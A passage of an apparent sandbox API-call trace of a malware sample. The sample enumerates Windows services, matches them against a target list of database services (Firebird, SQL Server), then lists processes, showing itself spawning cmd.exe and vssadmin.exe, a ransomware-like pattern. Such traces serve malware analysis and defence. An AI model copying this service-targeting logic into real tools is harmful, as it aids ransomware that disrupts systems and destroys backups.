lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0317.965] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0317.965] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0317.965] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0317.966] lstrlenW (lpString="SecurityHealthService") returned 21 [0317.966] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SecurityHealthService") returned -1 [0317.966] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SecurityHealthService") returned -1 [0317.966] lstrcmpiW (lpString1="sqlwriter", lpString2="SecurityHealthService") returned 1 [0317.966] lstrcmpiW (lpString1="mssqlserver", lpString2="SecurityHealthService") returned -1 [0317.966] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SecurityHealthService") returned 1 [0317.966] lstrlenW (lpString="SENS") returned 4 [0317.966] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0317.966] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0317.966] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0317.966] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0317.966] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0317.966] lstrlenW (lpString="ShellHWDetection") returned 16 [0317.966] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0317.966] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0317.966] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0317.966] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0317.966] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0317.966] lstrlenW (lpString="Spooler") returned 7 [0317.966] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0317.966] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0317.966] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0317.966] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0317.966] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0317.966] lstrlenW (lpString="StateRepository") returned 15 [0317.967] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="StateRepository") returned -1 [0317.967] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="StateRepository") returned -1 [0317.967] lstrcmpiW (lpString1="sqlwriter", lpString2="StateRepository") returned -1 [0317.967] lstrcmpiW (lpString1="mssqlserver", lpString2="StateRepository") returned -1 [0317.967] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="StateRepository") returned -1 [0317.967] lstrlenW (lpString="SysMain") returned 7 [0317.967] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0317.967] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0317.967] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0317.967] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0317.967] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0317.967] lstrlenW (lpString="SystemEventsBroker") returned 18 [0317.967] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SystemEventsBroker") returned -1 [0317.967] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SystemEventsBroker") returned -1 [0317.967] lstrcmpiW (lpString1="sqlwriter", lpString2="SystemEventsBroker") returned -1 [0317.967] lstrcmpiW (lpString1="mssqlserver", lpString2="SystemEventsBroker") returned -1 [0317.967] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SystemEventsBroker") returned -1 [0317.967] lstrlenW (lpString="Themes") returned 6 [0317.967] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0317.967] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0317.968] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0317.968] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0317.968] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x41549e0 | out: hHeap=0x470000) returned 1 [0317.968] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x540 [0317.975] Process32FirstW (in: hSnapshot=0x540, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0317.976] Process32NextW (in: hSnapshot=0x540, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x72, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0317.977] lstrlenW (lpString="System") returned 6 [0317.977] Process32NextW (in: hSnapshot=0x540, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0317.978] lstrlenW (lpString="smss.exe") returned 8 [0317.978] Process32NextW (in: hSnapshot=0x540, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x19c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0317.978] lstrlenW (lpString="csrss.exe") returned 9 [0317.978] Process32NextW (in: hSnapshot=0x540, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x19c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0318.152] lstrlenW (lpString="wininit.exe") returned 11 [0318.152] Process32NextW (in: hSnapshot=0x540, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e0, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0318.153] lstrlenW (lpString="csrss.exe") returned 9 [0318.153] Process32NextW (in: hSnapshot=0x540, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1e0, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0318.154] lstrlenW (lpString="winlogon.exe") returned 12 [0318.154] Process32NextW (in: hSnapshot=0x540, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x24c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1e8, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0318.155] lstrlenW (lpString="services.exe") returned 12 [0318.155] Process32NextW (in: hSnapshot=0x540, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1e8, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0318.155] lstrlenW (lpString="lsass.exe") returned 9 [0318.155] Process32NextW (in: hSnapshot=0x540, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x230, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0318.156] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0318.156] Process32NextW (in: hSnapshot=0x540, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0318.157] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0318.157] Process32NextW (in: hSnapshot=0x540, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0318.158] lstrlenW (lpString="svchost.exe") returned 11 [0318.158] Process32NextW (in: hSnapshot=0x540, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0318.159] lstrlenW (lpString="svchost.exe") returned 11 [0318.159] Process32NextW (in: hSnapshot=0x540, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x368, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x230, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0318.160] lstrlenW (lpString="dwm.exe") returned 7 [0318.160] Process32NextW (in: hSnapshot=0x540, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0318.160] lstrlenW (lpString="svchost.exe") returned 11 [0318.160] Process32NextW (in: hSnapshot=0x540, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0318.161] lstrlenW (lpString="svchost.exe") returned 11 [0318.161] Process32NextW (in: hSnapshot=0x540, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4b, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0318.162] lstrlenW (lpString="svchost.exe") returned 11 [0318.162] Process32NextW (in: hSnapshot=0x540, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x16c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0318.162] lstrlenW (lpString="svchost.exe") returned 11 [0318.163] Process32NextW (in: hSnapshot=0x540, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x24, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0318.163] lstrlenW (lpString="svchost.exe") returned 11 [0318.163] Process32NextW (in: hSnapshot=0x540, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x490, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0318.164] lstrlenW (lpString="svchost.exe") returned 11 [0318.164] Process32NextW (in: hSnapshot=0x540, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x52c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0318.165] lstrlenW (lpString="svchost.exe") returned 11 [0318.165] Process32NextW (in: hSnapshot=0x540, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x584, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0318.166] lstrlenW (lpString="svchost.exe") returned 11 [0318.166] Process32NextW (in: hSnapshot=0x540, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0318.166] lstrlenW (lpString="svchost.exe") returned 11 [0318.166] Process32NextW (in: hSnapshot=0x540, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0318.167] lstrlenW (lpString="svchost.exe") returned 11 [0318.167] Process32NextW (in: hSnapshot=0x540, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0318.168] lstrlenW (lpString="spoolsv.exe") returned 11 [0318.168] Process32NextW (in: hSnapshot=0x540, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x668, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0318.168] lstrlenW (lpString="svchost.exe") returned 11 [0318.169] Process32NextW (in: hSnapshot=0x540, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x52c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0318.169] lstrlenW (lpString="audiodg.exe") returned 11 [0318.169] Process32NextW (in: hSnapshot=0x540, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0318.170] lstrlenW (lpString="OfficeClickToRun.exe") returned 20 [0318.170] Process32NextW (in: hSnapshot=0x540, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x714, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="SecurityHealthService.exe")) returned 1 [0318.171] lstrlenW (lpString="SecurityHealthService.exe") returned 25 [0318.171] Process32NextW (in: hSnapshot=0x540, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x774, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x4, pcPriClassBase=8, dwFlags=0x0, szExeFile="Memory Compression")) returned 1 [0318.171] lstrlenW (lpString="Memory Compression") returned 18 [0318.171] Process32NextW (in: hSnapshot=0x540, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x3e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0318.172] lstrlenW (lpString="sihost.exe") returned 10 [0318.172] Process32NextW (in: hSnapshot=0x540, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0318.173] lstrlenW (lpString="svchost.exe") returned 11 [0318.173] Process32NextW (in: hSnapshot=0x540, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x938, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x3e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0318.174] lstrlenW (lpString="taskhostw.exe") returned 13 [0318.174] Process32NextW (in: hSnapshot=0x540, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x37, th32ParentProcessID=0xa10, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0318.174] lstrlenW (lpString="explorer.exe") returned 12 [0318.174] Process32NextW (in: hSnapshot=0x540, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x2e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0318.175] lstrlenW (lpString="ShellExperienceHost.exe") returned 23 [0318.175] Process32NextW (in: hSnapshot=0x540, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x2e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0318.176] lstrlenW (lpString="SearchUI.exe") returned 12 [0318.176] Process32NextW (in: hSnapshot=0x540, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x744, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0318.177] lstrlenW (lpString="RuntimeBroker.exe") returned 17 [0318.177] Process32NextW (in: hSnapshot=0x540, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x2e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0318.178] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0318.178] Process32NextW (in: hSnapshot=0x540, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0xa24, pcPriClassBase=8, dwFlags=0x0, szExeFile="wdgmug.exe")) returned 1 [0318.179] lstrlenW (lpString="wdgmug.exe") returned 10 [0318.179] Process32NextW (in: hSnapshot=0x540, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xddc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xdd0, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0318.179] lstrlenW (lpString="cmd.exe") returned 7 [0318.179] Process32NextW (in: hSnapshot=0x540, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xddc, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0318.180] lstrlenW (lpString="conhost.exe") returned 11 [0318.180] Process32NextW (in: hSnapshot=0x540, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0xddc, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 1 [0318.181] lstrlenW (lpString="vssadmin.exe") returned 12 [0318.181] Process32NextW (in: hSnapshot=0x540, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xebc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x3e4, pcPriClassBase=13, dwFlags=0x0, szExeFile="consent.exe")) returned 1 [0318.181] lstrlenW (lpString="consent.exe") returned 11 [0318.182] Process32NextW (in: hSnapshot=0x540, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xebc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x3e4, pcPriClassBase=13, dwFlags=0x0, szExeFile="consent.exe")) returned 0 [0318.183] CloseHandle (hObject=0x540) returned 1 [0318.183] Sleep (dwMilliseconds=0x1f4) [0318.928] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x401a418 [0318.943] EnumServicesStatusExW (in: hSCManager=0x401a418, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x248ff3c, lpServicesReturned=0x248ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x248ff3c, lpServicesReturned=0x248ff54, lpResumeHandle=0x0) returned 0 [0318.944] GetLastError () returned 0xea [0318.944] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x1cb6) returned 0x41549e0 [0318.945] EnumServicesStatusExW (in: hSCManager=0x401a418, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x41549e0, cbBufSize=0x1cb6, pcbBytesNeeded=0x248ff3c, lpServicesReturned=0x248ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x41549e0, pcbBytesNeeded=0x248ff3c, lpServicesReturned=0x248ff54, lpResumeHandle=0x0) returned 1 [0318.946] CloseServiceHandle (hSCObject=0x401a418) returned 1 [0318.946] lstrlenW (lpString="Appinfo") returned 7 [0318.946] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0318.946] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0318.947] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0318.947] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0318.947] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0318.947] lstrlenW (lpString="AppXSvc") returned 7 [0318.947] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AppXSvc") returned 1 [0318.947] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AppXSvc") returned 1 [0318.947] lstrcmpiW (lpString1="sqlwriter", lpString2="AppXSvc") returned 1 [0318.947] lstrcmpiW (lpString1="mssqlserver", lpString2="AppXSvc") returned 1 [0318.947] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AppXSvc") returned 1 [0318.947] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0318.947] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0318.947] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0318.947] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0318.947] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0318.947] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0318.947] lstrlenW (lpString="Audiosrv") returned 8 [0318.947] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Audiosrv") returned 1 [0318.947] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Audiosrv") returned 1 [0318.947] lstrcmpiW (lpString1="sqlwriter", lpString2="Audiosrv") returned 1 [0318.947] lstrcmpiW (lpString1="mssqlserver", lpString2="Audiosrv") returned 1 [0318.947] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Audiosrv") returned 1 [0318.947] lstrlenW (lpString="BFE") returned 3 [0318.947] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0318.947] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0318.947] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0318.947] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0318.947] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0318.947] lstrlenW (lpString="BITS") returned 4 [0318.947] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BITS") returned 1 [0318.948] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BITS") returned 1 [0318.948] lstrcmpiW (lpString1="sqlwriter", lpString2="BITS") returned 1 [0318.948] lstrcmpiW (lpString1="mssqlserver", lpString2="BITS") returned 1 [0318.948] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BITS") returned 1 [0318.948] lstrlenW (lpString="BrokerInfrastructure") returned 20 [0318.948] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0318.948] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0318.948] lstrcmpiW (lpString1="sqlwriter", lpString2="BrokerInfrastructure") returned 1 [0318.948] lstrcmpiW (lpString1="mssqlserver", lpString2="BrokerInfrastructure") returned 1 [0318.948] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BrokerInfrastructure") returned 1 [0318.948] lstrlenW (lpString="CDPSvc") returned 6 [0318.948] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CDPSvc") returned 1 [0318.948] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CDPSvc") returned 1 [0318.948] lstrcmpiW (lpString1="sqlwriter", lpString2="CDPSvc") returned 1 [0318.948] lstrcmpiW (lpString1="mssqlserver", lpString2="CDPSvc") returned 1 [0318.948] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CDPSvc") returned 1 [0318.948] lstrlenW (lpString="ClickToRunSvc") returned 13 [0318.948] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0318.948] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0318.948] lstrcmpiW (lpString1="sqlwriter", lpString2="ClickToRunSvc") returned 1 [0318.948] lstrcmpiW (lpString1="mssqlserver", lpString2="ClickToRunSvc") returned 1 [0318.948] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ClickToRunSvc") returned 1 [0318.948] lstrlenW (lpString="CoreMessagingRegistrar") returned 22 [0318.948] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0318.948] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0318.948] lstrcmpiW (lpString1="sqlwriter", lpString2="CoreMessagingRegistrar") returned 1 [0318.948] lstrcmpiW (lpString1="mssqlserver", lpString2="CoreMessagingRegistrar") returned 1 [0318.948] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CoreMessagingRegistrar") returned 1 [0318.948] lstrlenW (lpString="CryptSvc") returned 8 [0318.948] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", 